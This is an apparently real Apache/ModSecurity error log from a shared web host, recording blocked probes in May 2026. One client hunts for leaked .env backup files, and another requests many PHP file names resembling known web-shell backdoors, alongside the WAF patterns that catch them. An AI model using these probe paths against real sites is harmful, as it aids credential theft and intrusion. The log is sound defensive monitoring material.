[Tue May 26 13:12:42.419571 2026] [security2:error] [pid 496740:tid 496886] [client 207.241.173.38:44208] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.sw[a-z]$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1275"] [id "390587"] [rev "5"] [msg "Atomicorp.com WAF Rules: Attack Blocked - Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .sw)"] [severity "CRITICAL"] [hostname "mail.besglam.com"] [uri "/.env.swp"] [unique_id "ahVO8uvOeft4ltnLrH49bwAAABA"]
[Tue May 26 13:12:42.504607 2026] [security2:error] [pid 496740:tid 496950] [client 207.241.173.38:44144] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.backup$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1279"] [id "390588"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked - Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .backup)"] [severity "CRITICAL"] [hostname "mail.besglam.com"] [uri "/.env.backup"] [unique_id "ahVO8uvOeft4ltnLrH49egAAAFA"]
[Tue May 26 13:12:42.509842 2026] [security2:error] [pid 496740:tid 496992] [client 57.141.2.49:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVO8uvOeft4ltnLrH49VwAAAHo"]
[Tue May 26 13:12:42.547270 2026] [security2:error] [pid 496740:tid 496965] [client 207.241.173.38:43938] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.backup$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1279"] [id "390588"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked - Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .backup)"] [severity "CRITICAL"] [hostname "mail.besglam.com"] [uri "/.env.local.backup"] [unique_id "ahVO8uvOeft4ltnLrH49fQAAAF8"]
[Tue May 26 13:12:42.614601 2026] [security2:error] [pid 496740:tid 496971] [client 207.241.173.38:43854] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.copy$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1269"] [id "390586"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked - Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .copy)"] [severity "CRITICAL"] [hostname "mail.besglam.com"] [uri "/.env.local.copy"] [unique_id "ahVO8uvOeft4ltnLrH49gQAAAGU"]
[Tue May 26 13:12:42.616734 2026] [security2:error] [pid 496740:tid 496928] [client 108.136.131.13:59008] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 13.131.136.108.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "agsnails.com"] [uri "/images/inputs.php"] [unique_id "ahVO8uvOeft4ltnLrH49gwAAADo"]
[Tue May 26 13:12:42.619170 2026] [security2:error] [pid 496740:tid 496960] [client 108.136.131.13:59011] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 13.131.136.108.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "agsnails.com"] [uri "/index/function.php"] [unique_id "ahVO8uvOeft4ltnLrH49hgAAAFo"]
[Tue May 26 13:12:42.619526 2026] [security2:error] [pid 496740:tid 496951] [client 108.136.131.13:59012] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 13.131.136.108.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "agsnails.com"] [uri "/indoxploit.php"] [unique_id "ahVO8uvOeft4ltnLrH49hQAAAFE"]
[Tue May 26 13:12:42.622788 2026] [security2:error] [pid 496740:tid 496939] [client 207.241.173.38:44018] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\.bak|\\\\.bak\\\\.php)$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1260"] [id "390582"] [rev "2"] [msg "Atomicorp.com WAF Rules: Attack Blocked - Data leakage - attempt to access backup file (disable this rule if you require access to files that nclude .bak)"] [severity "CRITICAL"] [hostname "mail.besglam.com"] [uri "/.env.production.bak"] [unique_id "ahVO8uvOeft4ltnLrH49iAAAAEU"]
[Tue May 26 13:12:42.622904 2026] [security2:error] [pid 496740:tid 496871] [client 207.241.173.38:44370] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.orig$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1266"] [id "390584"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked - Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .orig)"] [severity "CRITICAL"] [hostname "mail.besglam.com"] [uri "/.env.production.orig"] [unique_id "ahVO8uvOeft4ltnLrH49iQAAAAE"]
[Tue May 26 13:12:42.624867 2026] [security2:error] [pid 496740:tid 496942] [client 207.241.173.38:44364] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.sw[a-z]$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1275"] [id "390587"] [rev "5"] [msg "Atomicorp.com WAF Rules: Attack Blocked - Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .sw)"] [severity "CRITICAL"] [hostname "mail.besglam.com"] [uri "/.env.production.swp"] [unique_id "ahVO8uvOeft4ltnLrH49iwAAAEg"]
[Tue May 26 13:12:42.625654 2026] [security2:error] [pid 496740:tid 496967] [client 207.241.173.38:44340] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.backup$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1279"] [id "390588"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked - Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .backup)"] [severity "CRITICAL"] [hostname "mail.besglam.com"] [uri "/.env.production.backup"] [unique_id "ahVO8uvOeft4ltnLrH49jAAAAGE"]
[Tue May 26 13:12:42.627042 2026] [security2:error] [pid 496740:tid 496879] [client 207.241.173.38:44330] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.old$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1263"] [id "390583"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked - Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .old)"] [severity "CRITICAL"] [hostname "mail.besglam.com"] [uri "/.env.production.old"] [unique_id "ahVO8uvOeft4ltnLrH49jQAAAAk"]
[Tue May 26 13:12:42.629137 2026] [security2:error] [pid 496740:tid 496974] [client 207.241.173.38:44352] ModSecurity: Access denied with code 406 (phase 2). Pattern match "[a-z0-9]~$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1257"] [id "390581"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked - Data Leakage - attempt to access backup file (disable this rule if you require access to files that end with a tilde)"] [severity "CRITICAL"] [hostname "mail.besglam.com"] [uri "/.env.production~"] [unique_id "ahVO8uvOeft4ltnLrH49jgAAAGg"]
[Tue May 26 13:12:42.634427 2026] [security2:error] [pid 496740:tid 496975] [client 108.136.131.13:59014] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 13.131.136.108.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "agsnails.com"] [uri "/info.php"] [unique_id "ahVO8uvOeft4ltnLrH49jwAAAGk"]
[Tue May 26 13:12:44.118164 2026] [autoindex:error] [pid 496740:tid 496905] [client 207.241.173.38:44188] AH01276: Cannot serve directory /home2/besglde8/public_html/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive
[Tue May 26 13:12:44.888420 2026] [security2:error] [pid 496740:tid 496934] [client 57.141.2.54:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVO9OvOeft4ltnLrH493wAAAEA"]
[Tue May 26 13:12:45.650992 2026] [security2:error] [pid 496740:tid 496993] [client 108.136.131.13:59016] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 13.131.136.108.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "agsnails.com"] [uri "/init.php"] [unique_id "ahVO9evOeft4ltnLrH4-GgAAAHs"]
[Tue May 26 13:12:46.072721 2026] [security2:error] [pid 496740:tid 496971] [client 108.136.131.13:49411] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 13.131.136.108.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "agsnails.com"] [uri "/install.php"] [unique_id "ahVO9uvOeft4ltnLrH4-LQAAAGU"]
[Tue May 26 13:12:46.082795 2026] [security2:error] [pid 496740:tid 496960] [client 108.136.131.13:49419] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 13.131.136.108.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "agsnails.com"] [uri "/jindex.php"] [unique_id "ahVO9uvOeft4ltnLrH4-LgAAAFo"]
[Tue May 26 13:12:46.083154 2026] [security2:error] [pid 496740:tid 496951] [client 108.136.131.13:49413] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 13.131.136.108.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "agsnails.com"] [uri "/j.php"] [unique_id "ahVO9uvOeft4ltnLrH4-LwAAAFE"]
[Tue May 26 13:12:46.090937 2026] [security2:error] [pid 496740:tid 496958] [client 108.136.131.13:49424] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 13.131.136.108.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "agsnails.com"] [uri "/inputs.php"] [unique_id "ahVO9uvOeft4ltnLrH4-MAAAAFg"]
[Tue May 26 13:12:46.096987 2026] [security2:error] [pid 496740:tid 496931] [client 108.136.131.13:49412] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 13.131.136.108.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "agsnails.com"] [uri "/iq.php"] [unique_id "ahVO9uvOeft4ltnLrH4-MwAAAD0"]
[Tue May 26 13:12:46.516932 2026] [security2:error] [pid 496740:tid 496890] [client 108.136.131.13:51455] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 13.131.136.108.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "agsnails.com"] [uri "/kn.php"] [unique_id "ahVO9uvOeft4ltnLrH4-SAAAABQ"]
[Tue May 26 13:12:46.525835 2026] [security2:error] [pid 496740:tid 496928] [client 108.136.131.13:51451] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 13.131.136.108.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "agsnails.com"] [uri "/js.php"] [unique_id "ahVO9uvOeft4ltnLrH4-SQAAADo"]
[Tue May 26 13:12:46.534606 2026] [security2:error] [pid 496740:tid 496879] [client 108.136.131.13:51452] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 13.131.136.108.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "agsnails.com"] [uri "/k.php"] [unique_id "ahVO9uvOeft4ltnLrH4-SgAAAAk"]
[Tue May 26 13:12:46.536917 2026] [security2:error] [pid 496740:tid 496967] [client 108.136.131.13:51450] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 13.131.136.108.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "agsnails.com"] [uri "/js.php"] [unique_id "ahVO9uvOeft4ltnLrH4-SwAAAGE"]
[Tue May 26 13:12:46.548115 2026] [security2:error] [pid 496740:tid 496962] [client 108.136.131.13:51453] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 13.131.136.108.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "agsnails.com"] [uri "/kk.php"] [unique_id "ahVO9uvOeft4ltnLrH4-TAAAAFw"]
[Tue May 26 13:12:46.966824 2026] [security2:error] [pid 496740:tid 496911] [client 108.136.131.13:51789] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 13.131.136.108.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "agsnails.com"] [uri "/l.php"] [unique_id "ahVO9uvOeft4ltnLrH4-YQAAACk"]
[Tue May 26 13:12:46.970269 2026] [security2:error] [pid 496740:tid 496989] [client 108.136.131.13:51794] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 13.131.136.108.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "agsnails.com"] [uri "/loader/ff.php"] [unique_id "ahVO9uvOeft4ltnLrH4-ZAAAAHc"]
[Tue May 26 13:12:46.970324 2026] [security2:error] [pid 496740:tid 496875] [client 108.136.131.13:51790] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 13.131.136.108.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "agsnails.com"] [uri "/leaf.php"] [unique_id "ahVO9uvOeft4ltnLrH4-YwAAAAU"]
[Tue May 26 13:12:46.973023 2026] [security2:error] [pid 496740:tid 496906] [client 108.136.131.13:51793] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 13.131.136.108.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "agsnails.com"] [uri "/load.php"] [unique_id "ahVO9uvOeft4ltnLrH4-ZQAAACQ"]
[Tue May 26 13:12:46.986915 2026] [security2:error] [pid 496740:tid 496943] [client 108.136.131.13:51792] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 13.131.136.108.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "agsnails.com"] [uri "/lf.php"] [unique_id "ahVO9uvOeft4ltnLrH4-ZgAAAEk"]
[Tue May 26 13:12:47.081007 2026] [access_compat:error] [pid 496740:tid 496944] [client 185.177.72.30:0] AH01797: client denied by server configuration: /home2/samayikp/public_html/includes
[Tue May 26 13:12:47.410062 2026] [security2:error] [pid 496740:tid 496970] [client 108.136.131.13:52558] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 13.131.136.108.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "agsnails.com"] [uri "/log.php"] [unique_id "ahVO9-vOeft4ltnLrH4-eQAAAGQ"]
[Tue May 26 13:12:47.410504 2026] [security2:error] [pid 496740:tid 496990] [client 108.136.131.13:52556] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 13.131.136.108.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "agsnails.com"] [uri "/lock360.php"] [unique_id "ahVO9-vOeft4ltnLrH4-egAAAHg"]
[Tue May 26 13:12:47.411172 2026] [security2:error] [pid 496740:tid 496961] [client 108.136.131.13:52554] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 13.131.136.108.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "agsnails.com"] [uri "/local.php"] [unique_id "ahVO9-vOeft4ltnLrH4-ewAAAFs"]
[Tue May 26 13:12:47.416564 2026] [security2:error] [pid 496740:tid 496986] [client 108.136.131.13:52555] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 13.131.136.108.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "agsnails.com"] [uri "/lock.php"] [unique_id "ahVO9-vOeft4ltnLrH4-fAAAAHQ"]
[Tue May 26 13:12:47.442987 2026] [security2:error] [pid 496740:tid 496972] [client 108.136.131.13:52559] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 13.131.136.108.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "agsnails.com"] [uri "/login.php"] [unique_id "ahVO9-vOeft4ltnLrH4-fQAAAGY"]
[Tue May 26 13:12:47.761332 2026] [security2:error] [pid 496740:tid 496881] [client 57.141.2.37:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVO9-vOeft4ltnLrH4-dQAAAAs"]
[Tue May 26 13:12:47.873541 2026] [security2:error] [pid 496740:tid 496930] [client 108.136.131.13:52917] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 13.131.136.108.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "agsnails.com"] [uri "/lv.php"] [unique_id "ahVO9-vOeft4ltnLrH4-jQAAADw"]
[Tue May 26 13:12:47.877386 2026] [security2:error] [pid 496740:tid 496907] [client 108.136.131.13:52914] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 13.131.136.108.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "agsnails.com"] [uri "/mah.php"] [unique_id "ahVO9-vOeft4ltnLrH4-jgAAACU"]
[Tue May 26 13:12:47.878227 2026] [security2:error] [pid 496740:tid 496973] [client 108.136.131.13:52911] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 13.131.136.108.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "agsnails.com"] [uri "/m.php"] [unique_id "ahVO9-vOeft4ltnLrH4-kAAAAGc"]
[Tue May 26 13:12:47.880943 2026] [security2:error] [pid 496740:tid 496982] [client 108.136.131.13:52910] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 13.131.136.108.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "agsnails.com"] [uri "/lx.php"] [unique_id "ahVO9-vOeft4ltnLrH4-kQAAAHA"]
[Tue May 26 13:12:47.892206 2026] [security2:error] [pid 496740:tid 496953] [client 108.136.131.13:52912] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 13.131.136.108.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "agsnails.com"] [uri "/mad.php"] [unique_id "ahVO9-vOeft4ltnLrH4-lAAAAFM"]
[Tue May 26 13:12:48.315424 2026] [security2:error] [pid 496740:tid 496870] [client 108.136.131.13:53228] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 13.131.136.108.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "agsnails.com"] [uri "/marijuana.php"] [unique_id "ahVO-OvOeft4ltnLrH4-pAAAAAA"]
[Tue May 26 13:12:48.322661 2026] [security2:error] [pid 496740:tid 496885] [client 108.136.131.13:53227] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 13.131.136.108.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "agsnails.com"] [uri "/mari.php"] [unique_id "ahVO-OvOeft4ltnLrH4-pQAAAA8"]
[Tue May 26 13:12:48.327646 2026] [security2:error] [pid 496740:tid 496912] [client 108.136.131.13:53225] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 13.131.136.108.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "agsnails.com"] [uri "/manager.php"] [unique_id "ahVO-OvOeft4ltnLrH4-pgAAACo"]
[Tue May 26 13:12:48.338215 2026] [security2:error] [pid 496740:tid 496964] [client 108.136.131.13:53229] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 13.131.136.108.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "agsnails.com"] [uri "/mail.php"] [unique_id "ahVO-OvOeft4ltnLrH4-pwAAAF4"]
[Tue May 26 13:12:48.344770 2026] [security2:error] [pid 496740:tid 496908] [client 108.136.131.13:53226] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 13.131.136.108.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "agsnails.com"] [uri "/mar.php"] [unique_id "ahVO-OvOeft4ltnLrH4-qAAAACY"]
[Tue May 26 13:12:48.768751 2026] [security2:error] [pid 496740:tid 496873] [client 108.136.131.13:54074] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 13.131.136.108.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "agsnails.com"] [uri "/mini.php"] [unique_id "ahVO-OvOeft4ltnLrH4-uQAAAAM"]
[Tue May 26 13:12:48.776562 2026] [security2:error] [pid 496740:tid 496874] [client 108.136.131.13:54016] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 13.131.136.108.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "agsnails.com"] [uri "/MARIJUANA.php"] [unique_id "ahVO-OvOeft4ltnLrH4-ugAAAAQ"]
[Tue May 26 13:12:48.776708 2026] [security2:error] [pid 496740:tid 496937] [client 108.136.131.13:54070] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 13.131.136.108.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "agsnails.com"] [uri "/mass.php"] [unique_id "ahVO-OvOeft4ltnLrH4-vAAAAEM"]
[Tue May 26 13:12:48.777103 2026] [security2:error] [pid 496740:tid 496957] [client 108.136.131.13:54073] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 13.131.136.108.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "agsnails.com"] [uri "/min.php"] [unique_id "ahVO-OvOeft4ltnLrH4-vQAAAFc"]
[Tue May 26 13:12:48.777216 2026] [security2:error] [pid 496740:tid 496992] [client 108.136.131.13:54069] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 13.131.136.108.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "agsnails.com"] [uri "/mas.php"] [unique_id "ahVO-OvOeft4ltnLrH4-uwAAAHo"]
[Tue May 26 13:12:48.809136 2026] [proxy:error] [pid 496740:tid 496882] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 13:12:48.809208 2026] [proxy_http:error] [pid 496740:tid 496882] [client 147.185.132.70:60954] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 13:12:48.809910 2026] [proxy:error] [pid 496740:tid 496882] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 13:12:48.809956 2026] [proxy_http:error] [pid 496740:tid 496882] [client 147.185.132.70:60954] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 13:12:49.219760 2026] [security2:error] [pid 496740:tid 496953] [client 108.136.131.13:54568] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 13.131.136.108.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "agsnails.com"] [uri "/mrjn.php"] [unique_id "ahVO-evOeft4ltnLrH4-zgAAAFM"]
[Tue May 26 13:12:49.220608 2026] [security2:error] [pid 496740:tid 496960] [client 108.136.131.13:54601] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 13.131.136.108.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "agsnails.com"] [uri "/n.php"] [unique_id "ahVO-evOeft4ltnLrH4-zwAAAFo"]
[Tue May 26 13:12:49.220925 2026] [security2:error] [pid 496740:tid 496915] [client 108.136.131.13:54600] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 13.131.136.108.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "agsnails.com"] [uri "/new.php"] [unique_id "ahVO-evOeft4ltnLrH4-0AAAAC0"]
